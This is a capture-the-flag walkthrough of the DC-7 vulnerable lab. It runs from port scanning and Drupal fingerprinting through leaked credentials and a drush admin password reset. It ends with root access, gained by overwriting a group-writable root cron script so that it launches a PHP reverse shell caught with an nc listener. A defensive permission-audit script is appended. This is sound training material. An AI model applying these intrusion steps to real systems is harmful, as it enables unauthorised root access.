Target Machine Description
Description
DC-7 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
While this isn't an overly technical challenge, it isn't exactly easy.
While it's kind of a logical progression from an earlier DC release (I won't tell you which one), there are some new concepts involved, but you will need to figure those out for yourself. :-) If you need to resort to brute forcing or dictionary attacks, you probably won't succeed.
What you will need to do, is to think "outside" of the box.
Waaaaaay "outside" of the box. :-)
The ultimate goal of this challenge is to get root and to read the one and only flag.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.
Technical Information
DC-7 is a VirtualBox VM built on Debian 64 bit, but there shouldn't be any issues running it on most PCs.
I have tested this on VMWare Player, but if there are any issues running this VM in VMware, have a read through of this.
It is currently configured for Bridged Networking, however, this can be changed to suit your requirements. Networking is configured for DHCP.
Installation is simple - download it, unzip it, and then import it into VirtualBox or VMWare and away you go.
Important
While there should be no problems using this VM, by downloading it, you accept full responsibility for any unintentional damage that this VM may cause.
In saying that, there shouldn't be any problems, but I feel the need to throw this out there just in case.
Contact
I'm also very interested in hearing how people go about solving these challenges, so if you're up for writing a walkthrough, please do so and send me a link, or alternatively, follow me on Twitter, and DM me (you can unfollow after you've DM'd me if you'd prefer).
I can be contacted via Twitter - @DCAU7
Lab Environment
- Kali 2020: IP address 172.25.0.69
- DC-7 target: IP address 172.25.0.70
Port Scan
kali@kali:~$ nmap -A -p- 172.25.0.70
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-27 03:56 EST
Nmap scan report for 172.25.0.70
Host is up (0.0018s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 d0:02:e9:c7:5d:95:32:ab:10:99:89:84:34:3d:1e:f9 (RSA)
| 256 d0:d6:40:35:a7:34:a9:0a:79:34:ee:a9:6a:dd:f4:8f (ECDSA)
|_ 256 a8:55:d5:76:93:ed:4f:6f:f1:f7:a1:84:2f:af:bb:e1 (ED25519)
80/tcp open ssl/http Apache/2.4.25 (Debian)
|_http-generator: Drupal 8 (https://www.drupal.org)
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.txt /web.config /admin/
| /comment/reply/ /filter/tips /node/add/ /search/ /user/register/
| /user/password/ /user/login/ /user/logout/ /index.php/admin/
|_/index.php/comment/reply/
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Welcome to DC-7 | D7
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 121.15 seconds
Website Fingerprinting
Using the whatweb tool, we identify the site as being built on the Drupal 8 CMS.
kali@kali:~$ whatweb http://172.25.0.70
http://172.25.0.70 [200 OK] Apache[2.4.25], Content-Language[en], Country[RESERVED][ZZ], Drupal, HTML5, HTTPServer[Debian Linux][Apache/2.4.25 (Debian)], IP[172.25.0.70], MetaGenerator[Drupal 8 (https://www.drupal.org)], PoweredBy[-block], Script, Title[Welcome to DC-7 | D7], UncommonHeaders[x-drupal-dynamic-cache,link,x-content-type-options,x-generator,x-drupal-cache], X-Frame-Options[SAMEORIGIN], X-UA-Compatible[IE=edge]
Social Engineering
Approach: look for known, generic vulnerabilities in this framework.
Analysing and attempting to exploit the known vulnerabilities was unsuccessful, so we change approach.
We now turn our attention to the target description, which advises us to think "outside" the box.
Information gathering on the website reveals the person who wrote it.
Time for some social engineering.
We find that person's registered Twitter account, and they have uploaded the DC-7 website source code to GitHub. Analysing the source gives us a username and password for the DC-7 machine.
Source code audit: config.php contains a user name and its password.
<?php
$servername = "localhost";
$username = "dc7user";
$password = "MdR3xOgB7#dW";
$dbname = "Staff";
$conn = mysqli_connect($servername, $username, $password, $dbname);
?>
Host Information Gathering
Log in via SSH with this account.
The local mail gives a clue: root runs the /opt/scripts/backups.sh script as a scheduled (cron) task.
Reviewing the script reveals a drush command:
drush sql-dump --result-file=/home/dc7user/backups/website.sql
drush is the Drupal command-line tool used for configuration tasks; among other things it can change user names and passwords, so we use it to change the password of the admin back-end account.
Looking at the backup script, we see that it runs cd /var/www/html before using drush to dump the database,
so we also change to that directory and use drush to try to change the password of the default admin user. It succeeds!
dc7user@dc-7:~$ cd /var/www/html
dc7user@dc-7:/var/www/html$ drush user-password admin --password=123456
Changed password for admin [success]
dc7user@dc-7:/var/www/html$
Privilege Escalation
Because the script is owned by root but its group is www-data (and the group can write to it),
we can, as the www-data user, write a reverse-shell command into the scheduled backups script (note that the `>` redirect below replaces the script's contents rather than appending to them):
echo "php /tmp/webshel.php" > /opt/scripts/backups.sh
Here I use a PHP reverse shell.
Upload the PHP reverse shell with AntSword (蚁剑).
Wait for root's scheduled task to run the backups script.
On Kali, run nc -lvvp 9999 to listen on the port.
The shell connects back and we have root; the flag is in root's home directory~
kali@kali:~$ nc -lvvp 9999
listening on [any] 9999 ...
172.25.0.70: inverse host lookup failed: Unknown host
connect to [172.25.0.69] from (UNKNOWN) [172.25.0.70] 44232
/bin/sh: 0: can't access tty; job control turned off
# whoami
/bin/sh: 1: whoami: not found
# /bin/bash
whoami
root
python -c 'import pty;pty.spawn("/bin/bash")'
root@dc-7:/var/www# cd ~
cd ~
root@dc-7:~# ls
ls
theflag.txt
root@dc-7:~# cat theflag.txt
cat theflag.txt
888 888 888 888 8888888b. 888 888 888 888
888 o 888 888 888 888 "Y88b 888 888 888 888
888 d8b 888 888 888 888 888 888 888 888 888
888 d888b 888 .d88b. 888 888 888 888 .d88b. 88888b. .d88b. 888 888 888 888
888d88888b888 d8P Y8b 888 888 888 888 d88""88b 888 "88b d8P Y8b 888 888 888 888
88888P Y88888 88888888 888 888 888 888 888 888 888 888 88888888 Y8P Y8P Y8P Y8P
8888P Y8888 Y8b. 888 888 888 .d88P Y88..88P 888 888 Y8b. " " " "
888P Y888 "Y8888 888 888 8888888P" "Y88P" 888 888 "Y8888 888 888 888 888
Congratulations!!!
Hope you enjoyed DC-7. Just wanted to send a big thanks out there to all those
who have provided feedback, and all those who have taken the time to complete these little
challenges.
I'm sending out an especially big thanks to:
@4nqr34z
@D4mianWayne
@0xmzfr
@theart42
If you enjoyed this CTF, send me a tweet via @DCAU7.
root@dc-7:~#
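A defender-side check for the weakness exploited above, added here as an example and not part of the original write-up: it audits a script that root runs from cron, as /opt/scripts/backups.sh is on DC-7, and reports whether the file's owner, group or world permissions, or those of its directory, allow another account to modify what root will execute. The function names and the optional expected-owner argument are assumptions of this example.

```shell
#!/bin/sh
# Added example: audit a cron-run script for write access by other accounts.
# The DC-7 condition is a root-owned script with group www-data and group
# write permission; a www-data shell can then rewrite what root executes.

# check_writable_by_others PATH EXPECTED_OWNER
# Prints a finding and returns 1 if PATH is not owned by EXPECTED_OWNER,
# or is group- or world-writable; returns 0 otherwise.
check_writable_by_others() {
    p="$1"; expected_owner="$2"
    # POSIX 'ls -ld' fields: mode, link count, owner, group, ...
    # (the mode may carry a trailing '+' or '.' on ACL/SELinux systems)
    set -- $(ls -ld "$p")
    mode="$1"; owner="$3"; group="$4"
    problems=""
    [ "$owner" = "$expected_owner" ] || problems="$problems owner=$owner"
    # mode string: [type][rwx user][rwx group][rwx other]; 6th char is group write
    case "$mode" in ?????w*) problems="$problems group-writable(group=$group)" ;; esac
    # 9th char is world write (sticky /tmp-style dirs are flagged conservatively)
    case "$mode" in ????????w*) problems="$problems world-writable" ;; esac
    [ -z "$problems" ] && return 0
    echo "UNSAFE $p:$problems"
    return 1
}

# audit_cron_script PATH [EXPECTED_OWNER]   (EXPECTED_OWNER defaults to root)
# Exit status: 0 = only the expected owner can modify the script and its
# directory, 1 = someone else can modify one of them, 2 = file is missing.
# On DC-7 you would run:  audit_cron_script /opt/scripts/backups.sh
audit_cron_script() {
    f="$1"; expected_owner="${2:-root}"
    [ -f "$f" ] || { echo "MISSING $f"; return 2; }
    rc=0
    check_writable_by_others "$f" "$expected_owner" || rc=1
    # A writable parent directory lets the script be replaced outright.
    check_writable_by_others "$(dirname "$f")" "$expected_owner" || rc=1
    [ $rc -eq 0 ] && echo "OK $f"
    return $rc
}
```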